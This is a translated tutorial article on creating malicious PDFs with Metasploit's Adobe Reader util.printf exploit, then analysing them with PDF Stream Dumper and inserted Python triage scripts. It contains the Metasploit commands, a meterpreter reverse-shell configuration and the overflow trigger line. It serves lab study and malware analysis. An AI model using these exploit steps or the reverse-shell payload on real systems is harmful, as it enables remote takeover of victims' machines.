2025-01-31 Update From: SLTechnology News&Howtos
Shulou(Shulou.com) 06/02 Report
This article explains in detail how to analyze malicious PDF documents and how to extract the payload from them. The content is of high quality, so the editor shares it with you as a reference. I hope you will have a good understanding of the relevant knowledge after reading it.
Acrobat Reader is a PDF viewer that can read, search, print and interact with almost any type of PDF file. It is no exaggeration to say that almost every computer user has installed and used it. Because of its huge user base and frequent security problems, it has become one of the programs most often targeted by attackers. A Baidu search for "Acrobat Reader vulnerability" turns up an impressive list, nearly all rated high severity. It makes my hands itch.
I will show you the complete process of creating malicious PDF documents, triggering and exploiting vulnerabilities. In addition, I will also take you through an in-depth analysis of malicious PDF documents to understand how payload is stored and extracted.
PDF format
PDF (Portable Document Format) is a file format developed by Adobe in 1993 for document interchange.
PDF combines three technologies: a page-description model derived from PostScript, a font-embedding system, and a system for data compression and transport. Its advantages are that it is cross-platform, preserves the original layout of the file, and is an open standard that anyone can implement royalty-free in PDF-compatible software. The following is a structure diagram of a typical PDF document. For more information, see the Adobe specification.
Malicious PDF creation
We will use metasploit to create a maliciously forged PDF document that contains the exploit as well as our custom payload. Because this exploit only works against specific versions, we need to download and install an older version of Reader on the target machine.
First, let's create the PDF. After successful exploitation, the PDF will pop up a calculator (calc.exe) on the target machine. Open the metasploit console and type the following commands:
use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit
As follows:
Copy the file you just created (/home/osboxes/.msf4/local/malicious.pdf) to the shared drive.
Execute infected PDF
On the target computer, download and install the vulnerable version of Adobe Reader (metasploit has told us that the version should be less than 8.1.2). I chose to install version 8.1.1.
After installation, we open the malicious.pdf file. You should see a calculator spawned by the Adobe Reader process. The vulnerability was successfully exploited.
I prepared another malicious PDF, using a different payload, as follows:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.29
set LPORT 4455
As a result, we successfully built a backdoor (reverse shell) on Adobe Reader.
Analysis of infected PDF
Now, let's take a look at the contents of the malicious PDF and try to extract the payload from it (let's still take calc.exe PDF as an example).
First, download and install a tool called PDF Stream Dumper. Then use the tool to load our malicious PDF document (please take some time to familiarize yourself with the basic use of the tool).
Let's first use the "Exploit Scan" option in the menu bar to detect if there are some exploitable vulnerabilities:
Exploit CVE-2008-2992 Date:11.4.08 v8.1.2-util.printf-found in stream: 6
In fact, an exploitable vulnerability is hidden in stream 6.
But let's start from scratch: when looking for the vulnerability in a PDF, most of the time we encounter a heap spray created by JavaScript code. The heap spray fills the heap with copies of the payload so that the payload executes once the vulnerability is triggered.
If you open Stream 1, you can see:
/Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 5 0 R
Next, we open stream 5:
/Type /Action /S /JavaScript /JS 6 0 R
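The chain shown above (the Catalog's /OpenAction in stream 1, the /S /JavaScript action in stream 5, and its /JS reference) can also be followed without a GUI. The script below is an added example written for this article, not code from PDF Stream Dumper or from the original post. It assumes an uncompressed object layout, skips the xref table and object streams entirely, and builds its own constructed, harmless sample PDF so that it runs offline.

```python
import re
import zlib

# Pattern for uncompressed "N G obj ... endobj" objects. Deliberately simple:
# it does not parse the xref table or object streams (/ObjStm), which a
# real-world triage tool must also handle.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
REF_RE = re.compile(rb"/(\w+)\s+(\d+)\s+\d+\s+R")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def parse_objects(pdf):
    """Map object number -> raw object body (dictionary plus optional stream)."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def ref_target(body, key):
    """Object number referenced by /key in body (e.g. /OpenAction 5 0 R), or None."""
    for name, num in REF_RE.findall(body):
        if name == key.encode():
            return int(num)
    return None


def stream_data(body):
    """Raw stream bytes of an object, inflated when the filter is /FlateDecode."""
    m = STREAM_RE.search(body)
    if not m:
        return b""
    data = m.group(1)
    if re.search(rb"/Filter\s*/FlateDecode", body):
        data = zlib.decompress(data)
    return data


def open_action_javascript(pdf):
    """Follow /Catalog -> /OpenAction -> (/S /JavaScript) -> /JS and return the
    script text, or None when the document has no JavaScript open action."""
    objs = parse_objects(pdf)
    catalog = next((b for b in objs.values() if re.search(rb"/Type\s*/Catalog", b)), None)
    if catalog is None:
        return None
    action_num = ref_target(catalog, "OpenAction")
    if action_num not in objs or not re.search(rb"/S\s*/JavaScript", objs[action_num]):
        return None
    action = objs[action_num]
    js_num = ref_target(action, "JS")
    if js_num in objs:                                  # /JS 6 0 R: script in a stream
        return stream_data(objs[js_num]).decode("latin-1")
    m = re.search(rb"/JS\s*\((.*?)\)", action, re.S)   # /JS (inline string)
    return m.group(1).decode("latin-1") if m else None


def triage(pdf):
    """Cheap indicators an analyst checks before opening the file in a viewer."""
    js = open_action_javascript(pdf) or ""
    return {
        "open_action_js": bool(js),
        "unescape": "unescape(" in js,
        "util_printf": "util.printf(" in js,
    }


def build_sample_pdf(js_code):
    """Constructed, harmless PDF with the same object chain as the article's
    streams 1, 5 and 6 (Catalog -> OpenAction -> JavaScript action -> JS stream).
    The xref table is omitted; the parser above scans objects directly."""
    js_stream = zlib.compress(js_code.encode("latin-1"))
    bodies = [
        b"<< /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 5 0 R >>",
        b"<< /Type /Outlines /Count 0 >>",
        b"<< /Type /Pages /Kids [4 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 3 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S /JavaScript /JS 6 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(js_stream)
        + js_stream + b"\nendstream",
    ]
    pdf = b"%PDF-1.4\n"
    for num, body in enumerate(bodies, start=1):
        pdf += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


# Constructed sample script: a hex-escaped string and a dialog, no exploit.
SAMPLE_JS = 'var sc = unescape("%u9090%u9090%u4241%u4443"); app.alert("sample");'

if __name__ == "__main__":
    sample = build_sample_pdf(SAMPLE_JS)
    print(open_action_javascript(sample))
    print(triage(sample))
```

Running the script prints the recovered JavaScript and the indicator dictionary; pointing `open_action_javascript` at a real file read in binary mode works the same way as long as the objects are not packed into object streams.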
This executes the JavaScript in stream 6. The stream contains plain JavaScript, so now open the "Javascript_UI" menu. You can see a long string of hexadecimal-encoded characters assigned to a variable; this is what gets sprayed onto the heap. Here is our payload:
We select payload (the part between quotation marks) and open the "Shellcode_analysis" menu. Select "scDbg-LibEmu Emulation". At this point, a new window pops up and decodes the shellcode into bytes (you can even save it to a file):
LibEmu is a library that emulates the processor. It reports what the assembly code does as it executes. Click the "Launch" button and you will see:
Here, we can clearly see that shellcode opens a calc.exe window and exits. Let's do the same analysis with another malicious PDF (reverse shell):
You can see that the shellcode loads the library needed to work with sockets (ws2_32.dll) and tries to connect back to the C&C server.
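The hex-encoded string that PDF Stream Dumper hands to scDbg can also be decoded without the GUI. The following is an added example, not the article's or the tool's code: it decodes the %uXXXX escapes into the byte order JavaScript would lay out in memory, and flags the heap-spray shape together with the oversized util.printf width that the Exploit Scan reported in stream 6. The sample script and its placeholder bytes are constructed and inert, and the 1000-character width threshold is this example's own heuristic.

```python
import re

# %uXXXX is a UTF-16 code unit; JavaScript keeps the string in memory
# little-endian, so %u4241 becomes the bytes 41 42 ("AB"). %XX is one byte.
ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", re.S)
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
# util.printf("%NNNNN.NNNNNf", ...) with an oversized width is the shape the
# Exploit Scan matched for CVE-2008-2992; the 1000 threshold is this example's own.
PRINTF_RE = re.compile(r'util\.printf\s*\(\s*"%(\d+)\.(\d+)f"')


def decode_unescape(s):
    """Turn the argument of a JavaScript unescape() call into the bytes that
    would end up in memory (the bytes PDF Stream Dumper passes to scDbg)."""
    out = bytearray()
    for u16, u8, lit in ESC_RE.findall(s):
        if u16:
            out += int(u16, 16).to_bytes(2, "little")
        elif u8:
            out.append(int(u8, 16))
        else:
            out += lit.encode("latin-1")
    return bytes(out)


def unescape_payloads(js):
    """All unescape() string arguments in the script, decoded to bytes."""
    return [decode_unescape(m.group(2)) for m in UNESCAPE_RE.finditer(js)]


def extract_payload(js):
    """The longest decoded unescape() blob, which in a heap spray is the shellcode
    (the slide is usually grown by string doubling, not written as one long literal)."""
    payloads = unescape_payloads(js)
    return max(payloads, key=len) if payloads else b""


def heap_spray_indicators(js):
    """Static indicators for the heap-spray-plus-trigger pattern."""
    payloads = unescape_payloads(js)
    m = PRINTF_RE.search(js)
    width = int(m.group(1)) if m else 0
    return {
        "unescape_blocks": len(payloads),
        "nop_sled": any(p.startswith(b"\x90\x90") for p in payloads),
        "string_doubling_loop": bool(re.search(r"while\s*\([^)]*\.length\s*<", js)),
        "printf_width": width,
        "oversized_printf": width > 1000,
    }


# Constructed script in the shape of the article's stream 6. Inert placeholder
# bytes stand in for shellcode, so the sample does nothing if executed.
SAMPLE_JS = r'''
var shellcode = unescape("%u9090%u9090%u4241%u4443");
var slide = unescape("%u0A0A%u0A0A");
while (slide.length < 0x10000) slide += slide;
util.printf("%45000.45000f", 0);
'''

if __name__ == "__main__":
    print(extract_payload(SAMPLE_JS).hex())
    print(heap_spray_indicators(SAMPLE_JS))
```

The decoded bytes can be written to a file and fed to the same scDbg/LibEmu emulation the article uses; the indicator dictionary is the kind of result a triage rule would act on.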
I have not discussed the exploit itself, which sits at the end of the JavaScript code: it achieves arbitrary code execution through a buffer overflow in the util.printf function. The call that triggers it and hands control to the heap-sprayed shellcode is:
util.printf("%45000.45000f", 0);
That covers how to analyze malicious PDF documents and extract their payload. I hope the above content has been of some help to you and that you have learned something from it. If you think the article is good, share it for more people to see.
© 2024 shulou.com SLNews company. All rights reserved.